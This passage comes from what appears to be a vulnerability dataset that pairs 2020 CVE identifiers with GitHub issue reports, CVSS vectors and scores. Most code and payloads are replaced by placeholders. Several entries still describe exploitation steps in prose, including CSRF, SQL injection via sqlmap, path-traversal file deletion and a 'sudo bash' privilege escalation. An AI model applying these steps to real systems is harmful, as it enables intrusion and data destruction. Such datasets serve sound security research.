  57219. "Repo_new": "octopusdeploy/issues",
  57220. "Issue_Created_At": "2020-09-08T03:44:23Z",
  57221. "description": "Passwords written to deployment log in plain text NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  57222. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57223. "severity": "HIGH",
  57224. "baseScore": 7.5,
  57225. "impactScore": 3.6,
  57226. "exploitabilityScore": 3.9
  57227. },
  57228. {
  57229. "CVE_ID": "CVE-2020-24566",
  57230. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6563",
  57231. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6563",
  57232. "Repo_new": "octopusdeploy/issues",
  57233. "Issue_Created_At": "2020-09-08T03:28:35Z",
  57234. "description": "Passwords written to deployment log in plain text. Description APITAG A regression was introduced that caused certain passwords to be written to the deployment log without being masked. This only affects deployment processes that ran steps on the server/worker (not on targets). Affected versions APITAG Octopus Server NUMBERTAG Links CVE: CVETAG URLTAG Internal issue: URLTAG",
  57235. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57236. "severity": "HIGH",
  57237. "baseScore": 7.5,
  57238. "impactScore": 3.6,
  57239. "exploitabilityScore": 3.9
  57240. },
  57241. {
  57242. "CVE_ID": "CVE-2020-24574",
  57243. "Issue_Url_old": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1",
  57244. "Issue_Url_new": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1",
  57245. "Repo_new": "jtesta/gog_galaxy_client_service_poc",
  57246. "Issue_Created_At": "2021-01-22T23:22:15Z",
  57247. "description": "APITAG status update. APITAG in case anyone was wondering, the APITAG still works on GOG Galaxy NUMBERTAG last tested as of time of wriitng this). Just compiled and tested it and was able to create a local user and add them to the local administrators group on a testbed system. GOG has yet to fix the underlying issue, it seems. CVETAG is alive and well, yet.",
  57248. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57249. "severity": "HIGH",
  57250. "baseScore": 7.8,
  57251. "impactScore": 5.9,
  57252. "exploitabilityScore": 1.8
  57253. },
  57254. {
  57255. "CVE_ID": "CVE-2020-24616",
  57256. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2814",
  57257. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2814",
  57258. "Repo_new": "fasterxml/jackson-databind",
  57259. "Issue_Created_At": "2020-08-11T02:05:43Z",
  57260. "description": "Block one more gadget type (xxx, CVE xxxx xxx). (placeholder until investigated, evaluated, fixed) Another gadget type(s) reported regarding class(es) of [TO BE ADDED]. library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): [to be added] Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  57261. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57262. "severity": "HIGH",
  57263. "baseScore": 8.1,
  57264. "impactScore": 5.9,
  57265. "exploitabilityScore": 2.2
  57266. },
  57267. {
  57268. "CVE_ID": "CVE-2020-24740",
  57269. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/81",
  57270. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/81",
  57271. "Repo_new": "pluck-cms/pluck",
  57272. "Issue_Created_At": "2019-10-21T08:14:08Z",
  57273. "description": "An issue was discovered in Pluck NUMBERTAG de NUMBERTAG There is a CSRF vulnerability that can editpage via a APITAG CSRF POC: CODETAG FILETAG",
  57274. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  57275. "severity": "MEDIUM",
  57276. "baseScore": 4.3,
  57277. "impactScore": 1.4,
  57278. "exploitabilityScore": 2.8
  57279. },
  57280. {
  57281. "CVE_ID": "CVE-2020-24750",
  57282. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2798",
  57283. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2798",
  57284. "Repo_new": "fasterxml/jackson-databind",
  57285. "Issue_Created_At": "2020-07-16T17:25:52Z",
  57286. "description": "Block one more gadget type (xxx, CVE xxxx xxx). (placeholder until investigated, evaluated, fixed) Another gadget type(s) reported regarding class(es) of [TO BE ADDED]. library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): [to be added] Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  57287. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57288. "severity": "HIGH",
  57289. "baseScore": 8.1,
  57290. "impactScore": 5.9,
  57291. "exploitabilityScore": 2.2
  57292. },
  57293. {
  57294. "CVE_ID": "CVE-2020-24772",
  57295. "Issue_Url_old": "https://github.com/Dreamacro/clash/issues/910",
  57296. "Issue_Url_new": "https://github.com/dreamacro/clash/issues/910",
  57297. "Repo_new": "dreamacro/clash",
  57298. "Issue_Created_At": "2020-08-20T07:44:10Z",
  57299. "description": "FILETAG APITAG FILETAG \u53ef\u80fd\u7684\u89e3\u51b3\u65b9\u6848 Possible Solution Limit http or https to get configuration files \u66f4\u591a\u4fe1\u606f APITAG CVETAG \u6f0f\u6d1e \u7c7b\u4f3c URLTAG \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u7cbe\u5fc3\u6784\u9020\u7684iframe APITAG \u4f8b\u5982 ( APITAG APITAG ) \u5e76\u8bbf\u95ee\u6307\u5b9aSMB\u670d\u52a1\u5668 APITAG \u8bbf\u95ee\u653b\u51fb\u8005\u6784\u9020SMB\u7684\u670d\u52a1\u5668\u83b7\u53d6\u914d\u7f6e\u6587\u4ef6\u65f6 Windows\u4f1a\u8fdb\u884cNTLM\u8ba4\u8bc1 \u53d1\u9001NTLM\u54c8\u5e0c\u5230\u653b\u51fb\u8005\u7684\u670d\u52a1\u5668 \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528NTLM\u54c8\u5e0c\u8fdb\u884c\u7528\u6237\u5bc6\u7801\u7834\u89e3\u7b49\u64cd\u4f5c \u8be5\u6f0f\u6d1e\u6709\u4e00\u5b9a\u7684\u5371\u5bb3\u6027",
  57300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57301. "severity": "HIGH",
  57302. "baseScore": 8.8,
  57303. "impactScore": 5.9,
  57304. "exploitabilityScore": 2.8
  57305. },
  57306. {
  57307. "CVE_ID": "CVE-2020-24791",
  57308. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/561",
  57309. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/561",
  57310. "Repo_new": "daylightstudio/fuel-cms",
  57311. "Issue_Created_At": "2020-08-19T08:22:40Z",
  57312. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'fuel_replace_id' in PATHTAG FUEL CMS NUMBERTAG allows SQL Injection via parameter 'fuel_replace_id' in PATHTAG Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. POC: ERRORTAG Exploiting Step1. Burpsuite request payload: ERRORTAG Exploiting Setp2 use sqlmap and exploit it. APITAG APITAG APITAG",
  57313. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57314. "severity": "CRITICAL",
  57315. "baseScore": 9.8,
  57316. "impactScore": 5.9,
  57317. "exploitabilityScore": 3.9
  57318. },
  57319. {
  57320. "CVE_ID": "CVE-2020-24821",
  57321. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/52",
  57322. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/52",
  57323. "Repo_new": "aclements/libelfin",
  57324. "Issue_Created_At": "2020-08-15T13:18:45Z",
  57325. "description": "SEGV in function dwarf::cursor::skip_form at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_seg NUMBERTAG CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57327. "severity": "MEDIUM",
  57328. "baseScore": 5.5,
  57329. "impactScore": 3.6,
  57330. "exploitabilityScore": 1.8
  57331. },
  57332. {
  57333. "CVE_ID": "CVE-2020-24822",
  57334. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/50",
  57335. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/50",
  57336. "Repo_new": "aclements/libelfin",
  57337. "Issue_Created_At": "2020-08-15T13:16:38Z",
  57338. "description": "SEGV in function dwarf::cursor::uleb NUMBERTAG at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_segv CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57339. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57340. "severity": "MEDIUM",
  57341. "baseScore": 5.5,
  57342. "impactScore": 3.6,
  57343. "exploitabilityScore": 1.8
  57344. },
  57345. {
  57346. "CVE_ID": "CVE-2020-24823",
  57347. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/51",
  57348. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/51",
  57349. "Repo_new": "aclements/libelfin",
  57350. "Issue_Created_At": "2020-08-15T13:17:23Z",
  57351. "description": "SEGV in function dwarf::to_string at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_seg NUMBERTAG CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57352. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57353. "severity": "MEDIUM",
  57354. "baseScore": 5.5,
  57355. "impactScore": 3.6,
  57356. "exploitabilityScore": 1.8
  57357. },
  57358. {
  57359. "CVE_ID": "CVE-2020-24824",
  57360. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/48",
  57361. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/48",
  57362. "Repo_new": "aclements/libelfin",
  57363. "Issue_Created_At": "2020-08-15T13:10:45Z",
  57364. "description": "Global Buffer Overflow in function dwarf::line_table::line_table at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump_line. The testcase is APITAG CVETAG . I use the following command: APITAG and get: ERRORTAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57365. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57366. "severity": "MEDIUM",
  57367. "baseScore": 5.5,
  57368. "impactScore": 3.6,
  57369. "exploitabilityScore": 1.8
  57370. },
  57371. {
  57372. "CVE_ID": "CVE-2020-24825",
  57373. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/46",
  57374. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/46",
  57375. "Repo_new": "aclements/libelfin",
  57376. "Issue_Created_At": "2020-08-15T13:07:30Z",
  57377. "description": "SEGV in function line_table::line_table at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is dump_line_segv CVETAG . I use the following command: APITAG and got: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG",
  57378. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57379. "severity": "MEDIUM",
  57380. "baseScore": 5.5,
  57381. "impactScore": 3.6,
  57382. "exploitabilityScore": 1.8
  57383. },
  57384. {
  57385. "CVE_ID": "CVE-2020-24826",
  57386. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/49",
  57387. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/49",
  57388. "Repo_new": "aclements/libelfin",
  57389. "Issue_Created_At": "2020-08-15T13:15:40Z",
  57390. "description": "SEGV in function elf::section::as_strtab at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump syms. The testcase is dump_syms_segv CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57391. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57392. "severity": "MEDIUM",
  57393. "baseScore": 5.5,
  57394. "impactScore": 3.6,
  57395. "exploitabilityScore": 1.8
  57396. },
  57397. {
  57398. "CVE_ID": "CVE-2020-24827",
  57399. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/47",
  57400. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/47",
  57401. "Repo_new": "aclements/libelfin",
  57402. "Issue_Created_At": "2020-08-15T13:08:23Z",
  57403. "description": "SEGV in function dwarf::cursor::skip_form at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is dump_line_seg NUMBERTAG CVETAG . I use the following command: APITAG and got: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG",
  57404. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57405. "severity": "MEDIUM",
  57406. "baseScore": 5.5,
  57407. "impactScore": 3.6,
  57408. "exploitabilityScore": 1.8
  57409. },
  57410. {
  57411. "CVE_ID": "CVE-2020-24829",
  57412. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1422",
  57413. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1422",
  57414. "Repo_new": "gpac/gpac",
  57415. "Issue_Created_At": "2020-03-01T18:58:01Z",
  57416. "description": "APITAG heap buffer overflow APITAG in gf_m2ts_section_complete. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Thanks dr3dd",
  57417. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57418. "severity": "MEDIUM",
  57419. "baseScore": 5.5,
  57420. "impactScore": 3.6,
  57421. "exploitabilityScore": 1.8
  57422. },
  57423. {
  57424. "CVE_ID": "CVE-2020-24847",
  57425. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/277",
  57426. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/277",
  57427. "Repo_new": "xtr4nge/fruitywifi",
  57428. "Issue_Created_At": "2020-10-02T18:17:30Z",
  57429. "description": "Cross Site Request Forgery in APITAG NUMBERTAG ulnerability Description During the analysis of the product, it was observed that APITAG NUMBERTAG is vulnerable to Cross Site Request Forgery (CSRF) due to lack of CSRF protection in the APITAG endpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change of APITAG and APITAG value as per the attacker's choice. Steps to Reproduce NUMBERTAG Generate an HTML Proof of Concept with the below content. CODETAG NUMBERTAG Once the victim will open this HTML file, a CSRF request will be triggered to the legitimate server allowing the change of APITAG and hostapd_wpa_passphrase .",
  57430. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  57431. "severity": "MEDIUM",
  57432. "baseScore": 4.3,
  57433. "impactScore": 1.4,
  57434. "exploitabilityScore": 2.8
  57435. },
  57436. {
  57437. "CVE_ID": "CVE-2020-24848",
  57438. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/278",
  57439. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/278",
  57440. "Repo_new": "xtr4nge/fruitywifi",
  57441. "Issue_Created_At": "2020-10-02T18:22:50Z",
  57442. "description": "Privilege Escalation via excessive SUDOER Permission in APITAG NUMBERTAG Description During the analysis, it was observed that it is possible to abuse the Sudoer permissions of the software to perform a Privilege Escalation attack. An attacker with fruitywifi user privileges would be able to exploit the issue NUMBERTAG and can gain complete root access by executing commands as the superuser. Since the software has excessive sudo rights defined, it is possible to simply elevate the privileges without supplying any password by performing a simple command sudo bash .",
  57443. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  57444. "severity": "HIGH",
  57445. "baseScore": 7.8,
  57446. "impactScore": 5.9,
  57447. "exploitabilityScore": 1.8
  57448. },
  57449. {
  57450. "CVE_ID": "CVE-2020-24870",
  57451. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/330",
  57452. "Issue_Url_new": "https://github.com/libraw/libraw/issues/330",
  57453. "Repo_new": "libraw/libraw",
  57454. "Issue_Created_At": "2020-08-19T02:03:53Z",
  57455. "description": "stack buffer overflow in APITAG in APITAG poc: FILETAG reproduce steps NUMBERTAG compile libraw with Address sanitizer NUMBERTAG run command dcraw_emu APITAG result: ERRORTAG",
  57456. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57457. "severity": "HIGH",
  57458. "baseScore": 8.8,
  57459. "impactScore": 5.9,
  57460. "exploitabilityScore": 2.8
  57461. },
  57462. {
  57463. "CVE_ID": "CVE-2020-24877",
  57464. "Issue_Url_old": "https://github.com/h4ckdepy/zzzphp/issues/1",
  57465. "Issue_Url_new": "https://github.com/h4ckdepy/zzzphp/issues/1",
  57466. "Repo_new": "h4ckdepy/zzzphp",
  57467. "Issue_Created_At": "2020-08-19T09:49:05Z",
  57468. "description": "Vulnerability analysis.",
  57469. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57470. "severity": "CRITICAL",
  57471. "baseScore": 9.8,
  57472. "impactScore": 5.9,
  57473. "exploitabilityScore": 3.9
  57474. },
  57475. {
  57476. "CVE_ID": "CVE-2020-24889",
  57477. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/334",
  57478. "Issue_Url_new": "https://github.com/libraw/libraw/issues/334",
  57479. "Repo_new": "libraw/libraw",
  57480. "Issue_Created_At": "2020-08-20T11:30:55Z",
  57481. "description": "buffer overflow. Reproduce steps:",
  57482. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57483. "severity": "HIGH",
  57484. "baseScore": 7.8,
  57485. "impactScore": 5.9,
  57486. "exploitabilityScore": 1.8
  57487. },
  57488. {
  57489. "CVE_ID": "CVE-2020-24890",
  57490. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/335",
  57491. "Issue_Url_new": "https://github.com/libraw/libraw/issues/335",
  57492. "Repo_new": "libraw/libraw",
  57493. "Issue_Created_At": "2020-08-20T12:18:12Z",
  57494. "description": "segmentation fault in APITAG Reproduce steps NUMBERTAG compile provided test.c NUMBERTAG run command: ./test poc Stack trace: ERRORTAG Poc: FILETAG",
  57495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57496. "severity": "MEDIUM",
  57497. "baseScore": 5.5,
  57498. "impactScore": 3.6,
  57499. "exploitabilityScore": 1.8
  57500. },
  57501. {
  57502. "CVE_ID": "CVE-2020-24930",
  57503. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/191",
  57504. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/191",
  57505. "Repo_new": "wuzhicms/wuzhicms",
  57506. "Issue_Created_At": "2020-08-25T05:05:34Z",
  57507. "description": "wuzhicms NUMBERTAG Any file deletion vulnerability exists in the background. Any file deletion vulnerability was found in APITAG NUMBERTAG which allows an attacker to delete any other APITAG exploit condition is the login background and Directory overflow. Vulnerable PATHTAG ERRORTAG exploitation of vulnerability NUMBERTAG Enter the directory mode of the extension module FILETAG NUMBERTAG In directory mode, click return to the previous directory FILETAG APITAG parameters by capturing packets APITAG the parameter to \"dir=..\" FILETAG After the directory overflow, more delete options were found than before FILETAG APITAG FILETAG as a APITAG delete FILETAG FILETAG Delete the success! FILETAG NUMBERTAG We discover parameters by APITAG try to change the path to something else FILETAG NUMBERTAG A new FILETAG file was created on disk for the test FILETAG APITAG the parameter to \"URL PATHTAG FILETAG Delete the FILETAG cannot be found. FILETAG The POC is as follows: The path and parameters are determined according to the actual situation URLTAG",
  57508. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  57509. "severity": "HIGH",
  57510. "baseScore": 8.1,
  57511. "impactScore": 5.2,
  57512. "exploitabilityScore": 2.8
  57513. },
  57514. {
  57515. "CVE_ID": "CVE-2020-24939",
  57516. "Issue_Url_old": "https://github.com/stampit-org/supermixer/issues/9",
  57517. "Issue_Url_new": "https://github.com/stampit-org/supermixer/issues/9",
  57518. "Repo_new": "stampit-org/supermixer",
  57519. "Issue_Created_At": "2020-08-20T02:43:31Z",
  57520. "description": "Prototype pollution. I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. Vulnerability Description: Prototype Pollution is a vulnerability affecting APITAG Prototype Pollution refers to the ability to inject properties into existing APITAG language construct prototypes, such as objects. Proof of Concept: CODETAG Impact : APITAG Access to restricted data, RCE (depends on implementation)",
  57521. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  57522. "severity": "HIGH",
  57523. "baseScore": 7.5,
  57524. "impactScore": 3.6,
  57525. "exploitabilityScore": 3.9
  57526. },
  57527. {
  57528. "CVE_ID": "CVE-2020-24944",
  57529. "Issue_Url_old": "https://github.com/private-octopus/picoquic/issues/969",
  57530. "Issue_Url_new": "https://github.com/private-octopus/picoquic/issues/969",
  57531. "Repo_new": "private-octopus/picoquic",
  57532. "Issue_Created_At": "2020-07-02T16:25:16Z",
  57533. "description": "Denial of Service vulnerability (infinite loop) while parsing malicious QUIC frame. In picoquic QUIC server maliciously crafted QUIC frame triggers infinite loop while processing. Incorrect logical conditions in APITAG and APITAG leads to infinite loop after processing single packet in epoch NUMBERTAG Attack can be performed remotely without any user interaction and authentication. Proposed CVSS NUMBERTAG score: PATHTAG NUMBERTAG High) (picoquic can be used in embedded environments where infinite loop in one module affects whole system, because there is not pre emptive OS used) Packet that triggers this issue (attached zipped): APITAG To reproduce this issue in full server protocol session needs to be in state epoch NUMBERTAG ulnerable loop is located in function APITAG in picoquic/frames.c lines NUMBERTAG Log of the loop with displayed parameters and variables: APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG stream_id NUMBERTAG offset NUMBERTAG data_length NUMBERTAG fin NUMBERTAG consumed NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG stream_id NUMBERTAG offset NUMBERTAG data_length NUMBERTAG fin NUMBERTAG consumed NUMBERTAG Backtrace from gdb NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG bytes++; (gdb) bt NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG b NUMBERTAG in picoquic_parse_stream_header (bytes=bytes APITAG PATHTAG bytes_max=bytes_max APITAG APITAG APITAG APITAG fin=fin APITAG consumed NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG c3f1 in picoquic_decode_stream_frame (cnx=cnx APITAG bytes NUMBERTAG PATHTAG APITAG NUMBERTAG APITAG at PATHTAG NUMBERTAG f NUMBERTAG in picoquic_decode_frames (cnx=cnx APITAG path NUMBERTAG f NUMBERTAG bytes=<optimized out>, bytes APITAG NUMBERTAG APITAG epoch=epoch APITAG APITAG addr_to NUMBERTAG current_time NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in parse_frame_test (buffer NUMBERTAG byte_ma NUMBERTAG at PATHTAG NUMBERTAG fce in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG (gdb) bt full NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG i NUMBERTAG length NUMBERTAG b NUMBERTAG in picoquic_parse_stream_header (bytes=bytes APITAG PATHTAG bytes_max=bytes_max APITAG APITAG APITAG APITAG fin=fin APITAG consumed NUMBERTAG fffffffd NUMBERTAG at PATHTAG ret NUMBERTAG len = <optimized out> off NUMBERTAG length NUMBERTAG l_stream NUMBERTAG l_len NUMBERTAG l_off NUMBERTAG byte_inde NUMBERTAG FUNCTION__ = APITAG NUMBERTAG c3f1 in picoquic_decode_stream_frame (cnx=cnx APITAG bytes NUMBERTAG PATHTAG APITAG NUMBERTAG APITAG at PATHTAG stream_id NUMBERTAG data_length NUMBERTAG offset NUMBERTAG fin NUMBERTAG consumed NUMBERTAG f NUMBERTAG in picoquic_decode_frames (cnx=cnx APITAG path NUMBERTAG f NUMBERTAG bytes=<optimized out>, bytes APITAG NUMBERTAG APITAG epoch=epoch APITAG APITAG addr_to NUMBERTAG current_time NUMBERTAG at PATHTAG first_byte = <optimized out> bytes_ma NUMBERTAG ack_needed = <optimized out> pc = APITAG packet_data = {acked_path NUMBERTAG last_ack_delay NUMBERTAG last_time_stamp_received NUMBERTAG largest_sent_time NUMBERTAG delivered_prior NUMBERTAG delivered_time_prior NUMBERTAG delivered_sent_prior NUMBERTAG rs_is_path_limited NUMBERTAG FUNCTION__ = \"picoquic_decode_frames NUMBERTAG f NUMBERTAG in parse_frame_test (buffer NUMBERTAG byte_ma NUMBERTAG at PATHTAG epoch NUMBERTAG ret NUMBERTAG simulated_time NUMBERTAG saddr = {sin_family NUMBERTAG sin_port NUMBERTAG sin_addr = {s_addr NUMBERTAG sin_zero = PATHTAG qclient NUMBERTAG FUNCTION__ = \"parse_frame_test\" t_ret NUMBERTAG cn NUMBERTAG fce in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG result NUMBERTAG Source code snippet to reproduce issue (rest of parameters are based on APITAG from APITAG picoquic_decode_frames(cnx, cnx >path FILETAG",
  57534. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57535. "severity": "HIGH",
  57536. "baseScore": 7.5,
  57537. "impactScore": 3.6,
  57538. "exploitabilityScore": 3.9
  57539. },
  57540. {
  57541. "CVE_ID": "CVE-2020-24949",
  57542. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2312",
  57543. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2312",
  57544. "Repo_new": "php-fusion/PHP-Fusion",
  57545. "Issue_Created_At": "2020-05-04T06:01:50Z",
  57546. "description": "Privilege escalation in php fusion NUMBERTAG Describe the bug Privilege escalation in php fusion NUMBERTAG ia allow authenticated user (not admin) send a crafted request to the server and remote excute command (RCE) which is should be excuted only by admin. It occurred when allow_php_execution is on. The problem was located in function: FILETAG . To Reproduce Steps to reproduce the behavior: Admin already turns on: Allow PHP Execution NUMBERTAG Login as editor (not admin NUMBERTAG Goto link: URLTAG APITAG Desktop (please complete the following information): OS: Windows NUMBERTAG Browser firefox Version [e.g NUMBERTAG",
  57547. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  57548. "severity": "HIGH",
  57549. "baseScore": 8.8,
  57550. "impactScore": 5.9,
  57551. "exploitabilityScore": 2.8
